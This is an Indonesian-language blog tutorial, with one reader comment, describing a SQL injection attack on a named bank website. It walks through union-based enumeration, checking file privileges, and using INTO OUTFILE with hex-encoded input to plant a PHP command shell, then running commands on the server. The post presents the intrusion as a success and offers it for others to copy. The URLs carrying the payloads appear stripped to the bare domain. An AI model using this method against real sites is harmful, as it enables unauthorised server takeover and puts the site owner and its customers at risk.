[ MYSQL Injection INTO OUTFILE ]
target:http://janatabank.com.np/
author: X'1N73CT
bug ini sangat lah istimewa dikarenakan kita bisa upload shell tanpa login kedalam admin
ok langsung saja
[ testing ]
http://janatabank.com.np/
hasil:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\janata\news_de
error wahh vuln mysqli
lanjuutt kita cari jumlah tabelnya
[ mencari jumlah tabel ]
kita menggunakan perintah order by
http://janatabank.com.np/
http://janatabank.com.np/
http://janatabank.com.np/
http://janatabank.com.np/
http://janatabank.com.np/
ok kita pastikan jumlahnya ada 3
next
[ mencari angka injeksi ]
dengan menggunakan perintah union select
http://janatabank.com.np/
keluar angka2nya
[ mencari versinya ]
menggunakan perintah version() atau @@version
http://janatabank.com.np/
hasil:
hahay versinya 5 lanjut
saatnya testing kedua
[ testing into outfile ]
cara testingnya adalah dengan mengganti perintah version() dengan peritah file_priv diikuti
dengan perintah mysql.user
http://janatabank.com.np/
hasil:
terdapat huruf Y yang berarti yes hehe alias work jika hasilnya N maka gk bisa
lanjutt kita tes dengan peritah selanjutnya
[ memasukan shell ]
cara memasukan perintah shellnya adalah dengan mengganti perintah file_priv dengan script
shell cmd namun kali ini saya tidak akan langusng measukan script shellnya karena saya ingin
mengetes sekali lagi untuk memastikan bahwa web ini benar2 vuln
kali ini saya akan memasukan sebuah kata guna untuk menetes web ini
caranya adalah dengan mengganti peritah file_priv dengan sebuah kata dan diikuti dengan perintah
+INTO+OUTFILE+'directori file'--
cara mendapatkan directori file ini saya memanfaatkan error pada website ini
yakni
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\janata\news_de
disitu dikatakan bahwa terdapat error pada file news_detail.php pada directory C:\xampp\htdocs\janata\news_de
ok kita sudah dapat directorinya
sekarang saatnya mengubahnya kedalam perintah mysqli into outfile
http://janatabank.com.np/
yups perintah di atas ialah perintah
saya memasukan kata X'1N73CT WAS HERE lalu saya simpan di file tess.php
kemudian kita hexa kata X'1N73CT WAS HERE sehingga menjadi:
http://janatabank.com.np/
lalu enter
sekarang kita coba buka liknya
http://janatabank.com.np/
hasil:
1 X'1N73CT WAS HERE 3
yesss work
lanjutt kita injeksi dengan script shell cmd
http://janatabank.com.np/
kita hexa dulu
http://janatabank.com.np/
enter
lalu kita buka file banking.php
http://janatabank.com.np/
hasil:
1
Warning: system() [function.system]: Cannot execute a blank command in C:\xampp\htdocs\janata\banking
3
kita coba tes shell nya dengan cara
?cmd=dir <= untuk server windows
?cmd=ls <= untuk linux
berhubung errornya C:\xampp\htdocs kelihatan kalau web ini menggunakan xampp dan xampp adalah bisa dijalankan diwindows
jadi bisa dipastikan server nya adalah windows
sekarang
saya coba
?cmd=dir
http://janatabank.com.np/
hasil:
wahhh mantapp script bekerja dengan sempurna
setelah ini tergantung pengguna untuk upload shell atau apa aja
sekian dari saya
semoga bermanfaat
salam dari saya
manteppp gan tutornya.... ajiiibbbbb dan membantu saya
ReplyDelete